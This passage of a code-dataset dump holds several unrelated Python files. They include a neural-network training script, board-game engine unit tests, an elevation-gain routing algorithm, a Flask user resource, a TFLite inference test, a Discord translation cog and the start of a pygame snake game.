2))\n hidden_layer_bias_gradient_array = np.zeros((1, 2))\n\n # Calculate gradients\n output_layer_gradient_array, hidden_layer_gradient_array, output_layer_bias_gradient_array, hidden_layer_bias_gradient_array = calculate_gradients(network_inputs, network_outputs, targets, layer1_node_outputs)\n\n # Update weights\n update_weights(weights_1, hidden_layer_gradient_array)\n update_weights(weights_2, output_layer_gradient_array)\n update_bias_weights(bias_weights[0], hidden_layer_bias_gradient_array[0])\n update_bias_weights(bias_weights[1], output_layer_bias_gradient_array[0])\n\ndef train(train_set_inputs, train_set_labels):\n \"\"\"Train the network with the training set.\"\"\"\n for i in range(np.size(train_set_labels, 0)):\n print(\"\\n\")\n print(train_set_inputs[i])\n # Forward pass\n layer1_outputs, network_outputs = forward_pass(train_set_inputs[i])\n print(\"\\nOutput: \" + str(network_outputs))\n writeToFile(\"\\nOutput: \" + str(network_outputs))\n writeToFile(\"\\tLabel: \" + str(train_set_labels[i]))\n print(\"Label: \" + str(train_set_labels[i]))\n loss = calculate_loss(network_outputs, train_set_labels[i])\n print(\"Loss: \" + str(loss))\n writeToFile(\"\\tLoss: \" + str(loss))\n\n # Back propogation\n back_prop(train_set_inputs[i], network_outputs, train_set_labels[i], layer1_outputs)\n\ndef calculate_accuracy(truePos, falsePos, trueNeg, falseNeg):\n \"\"\"Calculate the accuracy of the network.\"\"\"\n accuracy = (truePos + trueNeg)/(truePos + trueNeg + falsePos + falseNeg)\n\n return accuracy\n\ndef test(test_set_inputs, test_set_labels):\n \"\"\"Test the network with the test set.\"\"\"\n tp = 0\n fp = 0\n tn = 0\n fn = 0\n\n\n for i in range(np.size(test_set_labels, 0)):\n layer1_outputs, network_outputs = forward_pass(test_set_inputs[i])\n print(\"\\nOutput: \" + str(network_outputs))\n print(\"Label: \" + str(test_set_labels[i]))\n writeToFile(\"\\nOutput: \" + str(network_outputs))\n writeToFile(\"\\tLabel: \" + str(test_set_labels[i]))\n\n if test_set_labels[i][0] == 1.0:\n if network_outputs[0] > network_outputs[1]:\n tp = tp + 1\n else:\n fn = fn + 1\n elif test_set_labels[i][1] == 1.0:\n if network_outputs[1] > network_outputs[0]:\n tn = tn + 1\n else:\n fp = fp + 1\n\n accuracy = calculate_accuracy(tp, fp, tn, fn)\n print(\"\\n__________________\")\n print(\"Accuracy: \" + str(accuracy))\n writeToFile(\"\\n__________________\")\n writeToFile(\"\\nAccuracy: \" + str(accuracy))\n\ndef writeToFile(text):\n with open(write_file, 'a') as f:\n f.write(text)\n\ndef main():\n lines = read_data()\n i_train, i_test, o_train, o_test = split_data(lines)\n\n print(\"\\tTraining\")\n writeToFile(\"\\nTraining\")\n print(\"__________________\")\n writeToFile(\"\\n__________________\")\n train(i_train, o_train)\n\n print(\"\\n\\tTesting\")\n writeToFile(\"\\n\\nTesting\")\n print(\"__________________\")\n writeToFile(\"\\n__________________\")\n test(i_test, o_test)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"shaniceC/Neural-Network","sub_path":"neuralnet.py","file_name":"neuralnet.py","file_ext":"py","file_size_in_byte":10328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74511933688","text":"import unittest\nimport itertools\nfrom battleline.engine.BoardLogic import BoardLogic\nfrom battleline.model.FormationLogic import FormationLogic\nfrom battleline.model.Flag import FlagAlreadyClaimedError\nfrom battleline.Identifiers import Identifiers, TroopCard\n\n\nclass MockOutput(object):\n\n def play_action(self, place, card, flagNumber):\n pass\n\n def claim_action(self, place, flagNumber):\n pass\n\n def declare_winner(self, place):\n pass\n\n def setup_player_positions(self, playerName, place):\n pass\n\n\nclass MockEngine(object):\n\n def __init__(self):\n self.played_cards = []\n self.output_handler = MockOutput()\n\n def get_unplayed_cards(self):\n return set(get_all_cards()) - set(self.played_cards)\n\n\ndef get_all_cards():\n return [TroopCard(number, color) for number, color in itertools.product(range(1, 11), Identifiers.COLORS)]\n\n\nclass TestBoardLogic(unittest.TestCase):\n\n def setUp(self):\n self.logic = FormationLogic()\n self.engine = MockEngine()\n self.boardLogic = BoardLogic(self.engine)\n self.fullList = get_all_cards()\n\n def addCard(self, flag, player, card):\n self.boardLogic.addCard(flag, player, card)\n self.engine.played_cards.append(\n TroopCard(number=card[0], color=card[1]))\n \"\"\"test_checkAllFlags_empty\n\n test if the checkAllFlags function will work on an empty board\n \"\"\"\n\n def test_checkAllFlags_empty(self):\n self.boardLogic.checkAllFlags(Identifiers.NORTH)\n for flag in self.boardLogic.board.flags:\n self.assertEquals(flag.is_claimed(), False)\n\n def test_check_all_flags_one_side_empty_no_claim(self):\n self.addCard(0, Identifiers.NORTH, TroopCard(1, \"blue\"))\n self.addCard(0, Identifiers.NORTH, TroopCard(3, \"green\"))\n self.addCard(0, Identifiers.NORTH, TroopCard(5, \"red\"))\n self.boardLogic.checkAllFlags(Identifiers.NORTH)\n self.assertNotEqual(self.boardLogic.board.flags[\n 0].claimed, Identifiers.NORTH)\n self.assertNotEqual(self.boardLogic.board.flags[\n 0].claimed, Identifiers.SOUTH)\n\n def test_check_all_flags_one_side_empty_north_winner(self):\n for i, colors in enumerate(Identifiers.COLORS):\n if i + 1 != len(Identifiers.COLORS):\n self.addCard(i, Identifiers.NORTH, TroopCard(8, colors))\n self.addCard(i, Identifiers.NORTH, TroopCard(9, colors))\n self.addCard(i, Identifiers.SOUTH, TroopCard(10, colors))\n else:\n self.addCard(i, Identifiers.NORTH, TroopCard(8, colors))\n self.addCard(i, Identifiers.NORTH, TroopCard(9, colors))\n self.addCard(i, Identifiers.NORTH, TroopCard(10, colors))\n self.boardLogic.checkAllFlags(Identifiers.NORTH)\n self.assertEqual(self.boardLogic.board.flags[\n i].claimed, Identifiers.NORTH)\n\n def test_check_all_flags_one_side_empty_north_winner_formation_equivalent(self):\n self.addCard(0, Identifiers.NORTH,\n TroopCard(8, Identifiers.COLORS[0]))\n self.addCard(0, Identifiers.NORTH,\n TroopCard(9, Identifiers.COLORS[0]))\n self.addCard(0, Identifiers.NORTH,\n TroopCard(10, Identifiers.COLORS[0]))\n self.boardLogic.checkAllFlags(Identifiers.NORTH)\n self.assertEqual(self.boardLogic.board.flags[\n 0].claimed, Identifiers.NORTH)\n\n \"\"\"test_checkAllFlags_FlagContested_basic\n\n test if the checkAllFlags function will work on a non-empty board\n \"\"\"\n\n def test_checkAllFlags_FlagContested_basic(self):\n # flag 1: 10-9-8 vs 1-2-3\n self.addCard(0, Identifiers.NORTH, TroopCard(10, 'blue'))\n self.addCard(0, Identifiers.SOUTH, TroopCard(1, 'blue'))\n\n self.addCard(0, Identifiers.NORTH, TroopCard(9, 'blue'))\n self.addCard(0, Identifiers.SOUTH, TroopCard(2, 'blue'))\n\n self.addCard(0, Identifiers.NORTH, TroopCard(8, 'blue'))\n self.boardLogic.checkAllFlags(Identifiers.NORTH)\n with self.assertRaisesRegexp(FlagAlreadyClaimedError, \"south is attempting to place card on already claimed flag.\"):\n self.addCard(0, Identifiers.SOUTH, TroopCard(3, 'blue'))\n self.assertEqual(self.boardLogic.board.flags[\n 0].claimed, Identifiers.NORTH)\n\n # flag 2: 10R-9R-8R vs 1-2-3\n self.addCard(1, Identifiers.SOUTH, TroopCard(1, 'red'))\n self.addCard(1, Identifiers.NORTH, TroopCard(10, 'red'))\n\n self.addCard(1, Identifiers.SOUTH, TroopCard(2, 'red'))\n self.addCard(1, Identifiers.NORTH, TroopCard(9, 'red'))\n\n self.addCard(1, Identifiers.SOUTH, TroopCard(3, 'red'))\n self.addCard(1, Identifiers.NORTH, TroopCard(8, 'red'))\n self.boardLogic.checkAllFlags(Identifiers.SOUTH)\n self.assertEqual(self.boardLogic.board.flags[\n 0].claimed, Identifiers.NORTH)\n\n self.boardLogic.checkAllFlags(Identifiers.NORTH)\n self.assertEqual(self.boardLogic.board.flags[\n 1].claimed, Identifiers.NORTH)\n\n # flag 3: 10-9-_ vs 1-2-3 (8 is played on flag 9)\n self.addCard(8, Identifiers.SOUTH, TroopCard(8, 'green'))\n\n self.addCard(2, Identifiers.NORTH, TroopCard(10, 'green'))\n self.addCard(2, Identifiers.SOUTH, TroopCard(1, 'green'))\n\n self.addCard(2, Identifiers.NORTH, TroopCard(9, 'green'))\n self.addCard(2, Identifiers.SOUTH, TroopCard(2, 'green'))\n\n self.addCard(8, Identifiers.NORTH, TroopCard(5, 'blue'))\n self.addCard(2, Identifiers.SOUTH, TroopCard(3, 'green'))\n self.boardLogic.checkAllFlags(Identifiers.SOUTH)\n self.assertEqual(self.boardLogic.board.flags[\n 2].claimed, Identifiers.SOUTH)\n\n \"\"\"test_checkAllFlags_FlagContested_tied\n\n test if the checkAllFlags function will work when both formations and values are exactly the same\n \"\"\"\n\n def test_checkAllFlags_FlagContested_tied(self):\n # flag 5: 7-6-5(yellow) vs 7-6-5(purple)\n self.addCard(4, Identifiers.NORTH, TroopCard(7, 'yellow'))\n self.addCard(4, Identifiers.SOUTH, TroopCard(7, 'purple'))\n\n self.addCard(4, Identifiers.NORTH, TroopCard(6, 'yellow'))\n self.addCard(4, Identifiers.SOUTH, TroopCard(6, 'purple'))\n\n self.addCard(4, Identifiers.NORTH, TroopCard(5, 'yellow'))\n self.addCard(4, Identifiers.SOUTH, TroopCard(5, 'purple'))\n self.boardLogic.checkAllFlags(Identifiers.NORTH)\n self.assertEqual(self.boardLogic.board.flags[\n 4].claimed, Identifiers.NORTH)\n\n # flag 6: 3-2-1(yellow) vs 3-2-1(purple)\n self.addCard(5, Identifiers.SOUTH, TroopCard(3, 'purple'))\n self.addCard(5, Identifiers.NORTH, TroopCard(3, 'yellow'))\n\n self.addCard(5, Identifiers.SOUTH, TroopCard(2, 'purple'))\n self.addCard(5, Identifiers.NORTH, TroopCard(2, 'yellow'))\n\n self.addCard(5, Identifiers.SOUTH, TroopCard(1, 'purple'))\n self.addCard(5, Identifiers.NORTH, TroopCard(1, 'yellow'))\n\n #Since north added a card last it shouldn't claim the flag at the end of it's turn\n self.boardLogic.checkAllFlags(Identifiers.NORTH)\n self.assertEqual(self.boardLogic.board.flags[5].claimed, None)\n\n #South finished first so it should claim it at the end of it's turn\n self.boardLogic.checkAllFlags(Identifiers.SOUTH)\n self.assertEqual(self.boardLogic.board.flags[\n 5].claimed, Identifiers.SOUTH)\n\n def test_flag_is_playable(self):\n self.assertTrue(self.boardLogic.is_flag_playable(0, Identifiers.NORTH))\n self.assertTrue(self.boardLogic.is_flag_playable(0, Identifiers.SOUTH))\n\n self.boardLogic.board.get_flag(1).sides[Identifiers.NORTH] = [TroopCard(\n 1, \"color1\"), TroopCard(2, \"color1\"), TroopCard(3, \"color1\")]\n self.boardLogic.checkAllFlags(Identifiers.NORTH)\n self.assertFalse(\n self.boardLogic.is_flag_playable(0, Identifiers.NORTH))\n self.assertTrue(self.boardLogic.is_flag_playable(0, Identifiers.SOUTH))\n\n def test_flag_is_all_flags_playable(self):\n self.assertTrue(self.boardLogic.is_any_flag_playable(Identifiers.NORTH))\n for flag in xrange(1,10):\n self.boardLogic.board.get_flag(flag).sides[Identifiers.NORTH] = [TroopCard(\n 1, \"color1\"), TroopCard(2, \"color1\"), TroopCard(3, \"color1\")]\n self.assertFalse(\n self.boardLogic.is_any_flag_playable(Identifiers.NORTH))\n self.assertTrue(self.boardLogic.is_any_flag_playable(Identifiers.SOUTH))\n\n def test_check_breakthrough(self):\n # 3 adjacent flags.\n for flag, colorId in zip([1, 2, 3], range(0, 3)):\n for cardValue in range(8, 11):\n self.boardLogic.checkAllFlags(Identifiers.NORTH)\n self.assertIsNone(self.boardLogic.winner)\n self.boardLogic.addCard(\n flag, Identifiers.NORTH, TroopCard(cardValue, Identifiers.COLORS[colorId]))\n self.boardLogic.checkAllFlags(Identifiers.NORTH)\n self.assertEqual(self.boardLogic.winner, Identifiers.NORTH)\n\n def test_check_envelopment(self):\n # 5 flags.\n for flag, colorId in zip([1, 2, 4, 5, 7], range(0, 5)):\n for cardValue in range(8, 11):\n self.boardLogic.checkAllFlags(Identifiers.NORTH)\n self.assertIsNone(self.boardLogic.winner)\n self.boardLogic.addCard(\n flag, Identifiers.NORTH, TroopCard(cardValue, Identifiers.COLORS[colorId]))\n self.boardLogic.checkAllFlags(Identifiers.NORTH)\n self.assertEqual(self.boardLogic.winner, Identifiers.NORTH)\n","repo_name":"spelinski/BoardGameAiEngine","sub_path":"test/battleline/engine/testBoardLogic.py","file_name":"testBoardLogic.py","file_ext":"py","file_size_in_byte":9819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"44323661897","text":"# Isakov V.E.\r\n\r\nimport csv\r\nimport json\r\n\r\n\r\n# generator\r\ndef mygen():\r\n for i in range(5, 91):\r\n yield i\r\n\r\n\r\nmy_dict = dict()\r\n\r\n\r\ndef f1(x):\r\n return x / (x + 100)\r\n\r\n\r\ndef f2(x):\r\n return 1 / x\r\n\r\n\r\ndef f3(x):\r\n return 20 * (f1(x) + f2(x)) / x\r\n\r\n\r\nprint(\"Create a dictionary with functions results\")\r\nprint(\"f1(x) = x / (x + 100)\")\r\nprint(\"f2(x) = 1 / x\")\r\nprint(\"f3(x) = 20 * (f1(x) + f2(x)) / x\")\r\nprint(\"\\nx - [f1(x), f2(x), f3(x)]\")\r\n\r\nfor x in mygen():\r\n my_dict[x] = [f1(x), f2(x), f3(x)]\r\n print(x, \" - \", my_dict[x])\r\n\r\nprint(\"\\nCreate a csv file and write into it ...\")\r\nwith open('result.csv', 'w') as my_file:\r\n my_csv_writer = csv.writer(\r\n my_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\r\n my_csv_writer.writerow([\"x\", \"f1(x)\", \"f2(x)\", \"f3(x)\"])\r\n for x in my_dict:\r\n my_csv_writer.writerow([x] + my_dict[x])\r\n print(\"Done\")\r\n\r\nprint(\"\\nRead data from csv file ...\")\r\nmy_list = list()\r\nwith open('result.csv', 'r') as my_file:\r\n my_csv_reader = csv.reader(\r\n my_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\r\n for row in my_csv_reader:\r\n if(row):\r\n my_list.append(row)\r\nfor row in my_list:\r\n print(row)\r\n\r\nprint(\"\\nWrite data into json file ...\")\r\nwith open('result.json', 'w') as my_file:\r\n json.dump(my_list, my_file, indent=4)\r\nprint(\"Done\")\r\n","repo_name":"isakov-github/study","sub_path":"lesson_3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1259664480","text":"\"\"\"\n Elevation gain maximization algorithm within x% of shortest path\n\n @author: Benjamin Guinsburg\n\"\"\"\n\nimport networkx as nx, osmnx as ox\nimport copy\n\n\ndef find_path_edges(graph, path, max_weight='ele_gain'):\n\t\"\"\"\n Given a path as a list of nodes, and the weight to maximize, finds the \n edges that will maximize the weight between each node in the list. For \n convieniece this function returns the length and elevation gain found along\n all of these edges, in addition to the list of keys that corisponds to \n these edges.\n \n Parameters:\n -----------\n graph: NetworkX MultiDiGraph\n The graph that this path belongs to.\n path: list of int\n Each int should represent a node id in the graph along a path.\n min_weight: string\n The weight that will be maximized along the path.\n \n Returns: \n --------\n path_length: float\n The total distance along every edge found\n path_ele_gain: float\n The total elevation gain along every edge found\n path_edge_keys: list of int\n Each int represents the key of the edge between two consecutive nodes \n in path which minimizes min_weight. \n\t\"\"\" \n\tpath_length = 0\n\tpath_ele_gain = 0\n\tpath_edge_keys = []\n\tfor i in range(len(path) - 1):\n\t\tedges = graph[path[i]][path[i + 1]]\n\t\tmin_weight_edge = max(edges.keys(), key=lambda k: edges[k][max_weight])\n\t\tpath_length += edges[min_weight_edge]['length']\n\t\tpath_ele_gain += edges[min_weight_edge]['ele_gain']\n\t\tpath_edge_keys.append(min_weight_edge)\n\treturn (path_length, path_ele_gain, path_edge_keys)\n\ndef edge_path(node_path, edge_keys):\n\t\"\"\"\n Given a path as a list of nodes, and the key representing the edge between\n each node in the list, returns the path as a list of edges in the form\n (u, v, key).\n \n Parameters:\n -----------\n node_path: list of int\n Each int should represent a node id in the graph along a path.\n edge_keys: list of int\n Each int should represent the key of the edge between two nodes in\n node_path.\n \n Returns: \n --------\n edge_path: list of (int, int, int)\n Each tuple (u, v, key) in the list represents an edge in the graph:\n graph[u][v][key].\n\t\"\"\"\n\tedge_path = []\n\tfor i in range(len(node_path) - 1):\n\t\tedge_path.append((node_path[i], node_path[i + 1], edge_keys[i]))\n\treturn edge_path\n\n\n\"\"\"\nGiven a graph, networkx will generate the shortest path P from source to target based on length.\n\nIt will then loop over the nodes P, and for each node it will create a list L of all paths \nfrom P_n to P_n+1 with some cutoff depth. \nThe graph handed to nx.all_simple_paths will have had all nodes P_0 through P_n-1 removed [IMPORTANT].\nIt loops over L to find the path that has the properties:\n 1. ele_gain >= 0\n 2. length(P_0 -> P_n) + length(L[i]) + length(P_n+1 -> P_k)\n 3. L[i] has highest ele_gain in L\n \nUpon finding this path P_new, it will be inserted between P_n and P_n+1 \n\"\"\"\n\ndef maximize(graph, source, target, percent_shortest_path,):\n shortest_path = nx.shortest_path(graph, source, target, 'length')\n working_path = copy.deepcopy(shortest_path)\n\n shortest_path_len = nx.shortest_path_length(graph, source, target, 'length')\n max_length = shortest_path_len * percent_shortest_path\n\n alternate_paths_list = []\n\n #loop over nodes in the path to build alternate_paths_dict\n for i in range(len(shortest_path)-1):\n currentNode = shortest_path[i]\n nextNode = shortest_path[i+1]\n\n print(\"got currentNode = %d, and nextNode = %d, at iteration %d\" % (currentNode, nextNode, i))\n\n #remove all nodes except currentNode and nextNode for the graph for this function\n graph_truncated = copy.deepcopy(graph)\n graph_truncated.remove_nodes_from(shortest_path[0:i] + shortest_path[i + 2:])\n interPaths = nx.all_simple_paths(graph_truncated, currentNode, nextNode, cutoff=10)\n\n #find path in interPaths that has highest ele-gain\n ele_gain_max = 0\n path_length = 0\n biggestPath = []\n\n for path in interPaths:\n ele_gain, length, _ = find_path_edges(graph, path)\n\n if (ele_gain < 0): continue\n\n if (ele_gain > ele_gain_max):\n ele_gain_max = ele_gain\n path_length = length\n biggestPath = path\n\n biggest_path_length = len(biggestPath)\n\n if (path_length != 0 and biggest_path_length != 2):\n alternate_paths_list.append( (ele_gain_max/path_length, path_length, biggestPath, currentNode, nextNode) )\n\n\n alternate_paths_list.sort(key=lambda tup: tup[0], reverse=True)\n\n #loop over alternate_paths_list, and insert into working path\n for tuple in alternate_paths_list:\n working_path = insertPath(graph, working_path, tuple[1], tuple[2], tuple[3], tuple[4], max_length)\n \n # Show path on actual data model\n # Note: Google Maps and OpenStreetMaps have different data and our UI path\n # may differ from the actual path because of Google Map's intepretation of \n # the data it recieves.\n #ox.plot_graph_route(graph, working_path)\n \n best_dist, best_gain, best_keys = find_path_edges(graph, working_path)\n best_path = edge_path(working_path, best_keys)\n return (best_dist, best_gain, best_path)\n\n\ndef insertPath(graph, working_path, path_length, path, node1, node2, max_length):\n node1_ind = working_path.index(node1)\n node2_ind = working_path.index(node2)\n\n if path_length > max_length:\n return working_path\n else:\n return working_path[0:node1_ind] + path + working_path[node2_ind + 1:]","repo_name":"pratikmehta14/EleNa","sub_path":"flask/app/model/routing/max_search.py","file_name":"max_search.py","file_ext":"py","file_size_in_byte":5657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"16253240276","text":"from flask import request\nfrom flask_restful import Resource\nfrom typing import Dict, Any\nfrom db.api import get_user, del_user, add_user, get_user_data_from_JWT\nfrom db.classes import User as DB_User\n\n\nclass Users(Resource):\n\n def get(self) -> Dict[str, Any]:\n name = request.args.get('name')\n user = get_user(DB_User(name))\n if user:\n return user.dict()\n return None\n\n def post(self) -> [Dict[str, Any], int]:\n # need header: Content-type: application/json\n if 'x-access-token' in request.headers:\n if get_user_data_from_JWT(request.headers['x-access-token'])['role'] != \"admin\":\n return None\n else:\n return None\n data: dict = request.get_json()\n name: str = data[\"name\"]\n role: str = data[\"role\"]\n user_jwt: str = \"\"\n added_user: dict = add_user(DB_User(name, role, user_jwt))\n if added_user:\n del added_user[\"_id\"]\n return added_user, 201\n\n def delete(self) -> Dict[str, Any]:\n if 'x-access-token' in request.headers:\n if get_user_data_from_JWT(request.headers['x-access-token'])['role'] != \"admin\":\n return None\n else:\n return None\n name = request.args.get('name')\n user = get_user(DB_User(name))\n if not user:\n return None\n del_user(user)\n return user.dict()\n","repo_name":"maikleProko/examples-Python","sub_path":"prog001/src/routes/Users.py","file_name":"Users.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71952987448","text":"import tflite_runtime.interpreter as tflite\nimport numpy as np\n\n\nif __name__ == '__main__':\n interpreter = tflite.Interpreter(model_path='basic.tflite',\n experimental_delegates=[tflite.load_delegate('libedgetpu.so.1')])\n interpreter.allocate_tensors()\n\n # Get input and output tensors.\n input_details = interpreter.get_input_details()\n output_details = interpreter.get_output_details()\n\n # Test the model on random input data.\n input_shape = input_details[0]['shape']\n input_data = np.array(np.random.random_sample(input_shape), dtype=np.int8)\n interpreter.set_tensor(input_details[0]['index'], input_data)\n\n interpreter.invoke()\n\n # The function `get_tensor()` returns a copy of the tensor data.\n # Use `tensor()` in order to get a pointer to the tensor.\n output_data = interpreter.get_tensor(output_details[0]['index'])\n print(output_data)\n","repo_name":"BryanJHealy/coral_amici","sub_path":"src/util/basic_inference_test.py","file_name":"basic_inference_test.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"73774941369","text":"import pathlib\n\nimport click\nimport django\n\n\n# set up django. must be done before loading models. NB: requires DJANGO_SETTINGS_MODULE to be set\ndjango.setup()\n\nfrom forecast_repo.settings.local_sqlite3 import DATABASES\n\nfrom utils.project_truth import truth_data_qs, oracle_model_for_project\nfrom forecast_app.models import Project\n\n\n@click.command()\n@click.argument('sqlite_file', type=click.Path(dir_okay=False, exists=True, path_type=pathlib.Path))\n@click.argument('verbosity', type=click.Choice(['1', '2', '3', '4']), default='1')\ndef main(sqlite_file, verbosity):\n \"\"\"\n :param sqlite_file: the sqlite database file to print info from. as created by `bulk_data_load_app()`\n :param verbosity: increasing from 1 (minimal verbosity) to 3 (maximal)\n \"\"\"\n DATABASES['default']['NAME'] = sqlite_file\n\n projects = Project.objects.order_by('name')\n if len(projects) != 0:\n click.echo(f\"Found {len(projects)} projects: {projects}\")\n for project in projects:\n print_project_info(project, int(verbosity))\n else:\n click.echo(\"\")\n\n\ndef print_project_info(project, verbosity):\n # verbosity == 1\n oracle_model = oracle_model_for_project(project)\n first_truth_forecast = oracle_model.forecasts.first() if oracle_model else None\n click.echo(f\"\\n\\n* {project}. truth: # predictions={truth_data_qs(project).count()}, \"\n f\"source={repr(first_truth_forecast.source) if first_truth_forecast else ''}, \"\n f\"created_at={first_truth_forecast.created_at if first_truth_forecast else ''}. \"\n f\"(num_models, num_forecasts): {project.num_models_forecasts()}\")\n if verbosity == 1:\n return\n\n # verbosity == 2\n click.echo(f\"\\n** Targets ({project.targets.count()})\")\n for target in project.targets.all():\n click.echo(f\"- {target}\")\n\n click.echo(f\"\\n** Units ({project.units.count()})\")\n for unit in project.units.all().order_by('name'):\n click.echo(f\"- {unit}\")\n\n click.echo(f\"\\n** TimeZeros ({project.timezeros.count()})\")\n for timezero in project.timezeros.all():\n click.echo(f\"- {timezero}\")\n\n if verbosity == 2:\n return\n\n # verbosity == 3\n click.echo(f\"\\n** ForecastModels ({project.models.count()})\")\n for forecast_model in project.models.all():\n if verbosity == 3:\n click.echo(f\"- {forecast_model}\")\n else:\n click.echo(f\"*** {forecast_model} ({forecast_model.forecasts.count()} forecasts)\")\n if verbosity == 4:\n for forecast in forecast_model.forecasts.order_by('time_zero', 'issued_at'):\n click.echo(f\"- {forecast}: {forecast.pred_eles.count()} rows\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"reichlab/zoltpy","sub_path":"cli/print_project_info.py","file_name":"print_project_info.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"25506466373","text":"# originally from piyush: https://github.com/officialpiyush/modmail-plugins/translator\nimport discord\nfrom discord.ext import commands\n\nfrom googletrans import Translator\n\n\nclass TranslateToLanguage(commands.Cog):\n \"\"\"I translate text to specified languages.\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n self.translator = Translator()\n\n languagelist = {\n \"afrikaans\": \"af\",\n \"albanian\": \"sq\",\n \"amharic\": \"am\",\n \"arabic\": \"ar\",\n \"armenian\": \"hy\",\n \"azerbaijani\": \"az\",\n \"basque\": \"eu\",\n \"belarusian\": \"be\",\n \"bengali\": \"bn\",\n \"bosnian\": \"bs\",\n \"bulgarian\": \"bg\",\n \"catalan\": \"ca\",\n \"cebuano\": \"ceb\",\n \"chichewa\": \"ny\",\n \"chinese-simplified\": \"zh-cn\",\n \"chinese-traditional\": \"zh-tw\",\n \"corsican\": \"co\",\n \"croatian\": \"hr\",\n \"czech\": \"cs\",\n \"danish\": \"da\",\n \"dutch\": \"nl\",\n \"english\": \"en\",\n \"esperanto\": \"eo\",\n \"estonian\": \"et\",\n \"filipino\": \"tl\",\n \"finnish\": \"fi\",\n \"french\": \"fr\",\n \"frisian\": \"fy\",\n \"galician\": \"gl\",\n \"georgian\": \"ka\",\n \"german\": \"de\",\n \"greek\": \"el\",\n \"gujarati\": \"gu\",\n \"haitian-creole\": \"ht\",\n \"hausa\": \"ha\",\n \"hawaiian\": \"haw\",\n \"hebrew\": \"iw\",\n \"hindi\": \"hi\",\n \"hmong\": \"hmn\",\n \"hungarian\": \"hu\",\n \"icelandic\": \"is\",\n \"igbo\": \"ig\",\n \"indonesian\": \"id\",\n \"irish\": \"ga\",\n \"italian\": \"it\",\n \"japanese\": \"ja\",\n \"javanese\": \"jw\",\n \"kannada\": \"kn\",\n \"kazakh\": \"kk\",\n \"khmer\": \"km\",\n \"korean\": \"ko\",\n \"kurdish-kurmanji\": \"ku\",\n \"kyrgyz\": \"ky\",\n \"lao\": \"lo\",\n \"latin\": \"la\",\n \"latvian\": \"lv\",\n \"lithuanian\": \"lt\",\n \"luxembourgish\": \"lb\",\n \"macedonian\": \"mk\",\n \"malagasy\": \"mg\",\n \"malay\": \"ms\",\n \"malayalam\": \"ml\",\n \"maltese\": \"mt\",\n \"maori\": \"mi\",\n \"marathi\": \"mr\",\n \"mongolian\": \"mn\",\n \"myanmar-burmese\": \"my\",\n \"nepali\": \"ne\",\n \"norwegian\": \"no\",\n \"pashto\": \"ps\",\n \"persian\": \"fa\",\n \"polish\": \"pl\",\n \"portuguese\": \"pt\",\n \"punjabi\": \"pa\",\n \"romanian\": \"ro\",\n \"russian\": \"ru\",\n \"samoan\": \"sm\",\n \"scots-gaelic\": \"gd\",\n \"serbian\": \"sr\",\n \"sesotho\": \"st\",\n \"shona\": \"sn\",\n \"sindhi\": \"sd\",\n \"sinhala\": \"si\",\n \"slovak\": \"sk\",\n \"slovenian\": \"sl\",\n \"somali\": \"so\",\n \"spanish\": \"es\",\n \"sundanese\": \"su\",\n \"swahili\": \"sw\",\n \"swedish\": \"sv\",\n \"tajik\": \"tg\",\n \"tamil\": \"ta\",\n \"telugu\": \"te\",\n \"thai\": \"th\",\n \"turkish\": \"tr\",\n \"ukrainian\": \"uk\",\n \"urdu\": \"ur\",\n \"uzbek\": \"uz\",\n \"vietnamese\": \"vi\",\n \"welsh\": \"cy\",\n \"xhosa\": \"xh\",\n \"yiddish\": \"yi\",\n \"yoruba\": \"yo\",\n \"zulu\": \"zu\",\n \"Filipino\": \"fil\",\n \"Hebrew\": \"he\",\n }\n\n @commands.command(aliases=[\"ttl\"])\n async def translatetextlanguage(self, ctx, language, *, message):\n \"\"\"Translates a provided message into the specified language.\"\"\"\n try:\n tmsg = self.translator.translate(message, dest=language)\n embed = discord.Embed()\n embed.color = 0x1ED4E0\n embed.description = tmsg.text\n except ValueError:\n embed = discord.Embed()\n embed.color = self.bot.error_color\n embed.title = \"Invalid language. Use [p]languages for the usable languages.\"\n await ctx.send(embed=embed)\n\n @commands.command()\n async def languages(self, ctx):\n \"\"\"List of languages.\"\"\"\n desc = \"\"\n for lang in self.languagelist:\n desc += f\"```{lang}: {self.languagelist[lang]}```\\u200b\"\n\n embed = discord.Embed()\n embed.title = \"Use the codes on the right for the translate command.\"\n embed.color = 0x1ED4E0\n embed.description = desc\n await ctx.author.send(embed=embed)\n await ctx.send(f\"{ctx.author.mention}, sent you a dm with the list!\")\n\n\ndef setup(bot):\n bot.add_cog(TranslateToLanguage(bot))\n","repo_name":"Blackcluemodmail/Suggest","sub_path":"translatetolanguage/translatetolanguage.py","file_name":"translatetolanguage.py","file_ext":"py","file_size_in_byte":4283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5311899309","text":"# import\nimport pygame\nimport random\nfrom sys import exit\nfrom food import Food\nfrom snake import Snake\n\n# init\npygame.init()\n# variable\nNb_col=10\nNb_Row=15\nCell_size=40\n\nwindow=pygame.display.set_mode(size=(Nb_col*Cell_size,Nb_Row*Cell_size))\nrunning=True\nclock=pygame.time.Clock()\n\nfont=pygame.font.Font(\"3AB0DB_3_0.ca19d9b3.ttf\",32)\n# font.render(\"hello\",True,pygame.Color(\"green\"),pygame.Color(\"black\"))\n\n# timer\nscreen_update=pygame.USEREVENT\npygame.time.set_timer(screen_update,200)\n# # personnage\n# food=Food(window,Cell_size,Nb_col,Nb_Row)\n# 